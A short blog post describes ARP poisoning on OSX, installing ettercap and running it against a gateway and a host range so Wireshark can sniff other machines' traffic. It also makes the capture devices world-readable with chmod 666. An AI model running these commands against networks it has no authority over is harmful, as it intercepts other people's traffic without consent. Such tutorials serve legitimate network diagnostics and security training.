Man in the middle – ARP Poisoning on OSX

At the core of all investigation in relation to a networks is the need to sniff packets. If you have a switch with SPAN port capabilities then you can listen in from where ever you wish. However if for whatever reason this is not practical a network wiretap may be the answer.

From the PC under windows the proverbial Swiss army knife would be “Cain & Able” but on the unix front ettercap is your tool of choice.

My platform is current OSX so I have added notes of pulling down the MacPorts (see previous post for installing the environment).

To install ettercap :

sudo port install ettercap

Assuming that the default gateway on the network is 192.168.2.1 then to tap all traffic heading leaving the local LAN try the following :

sudo ettercap -T -M arp:remote /192.168.2.1/ /192.168.2.2-99/

Because you are running ettercap as root it will alter the permissions of the devices you’ll monitor from. So you need to change the permissins back so that for example Wireshark can open them. To open these devices up for Wireshark try the following:

chmod 666 /dev/bfp*

Now if you fire up Wireshark you will be able to select the relavent interface and sniff the traffic.

I found that applying an initial filter to ignore duplicate IP address messages make the view a little clearer.

Mick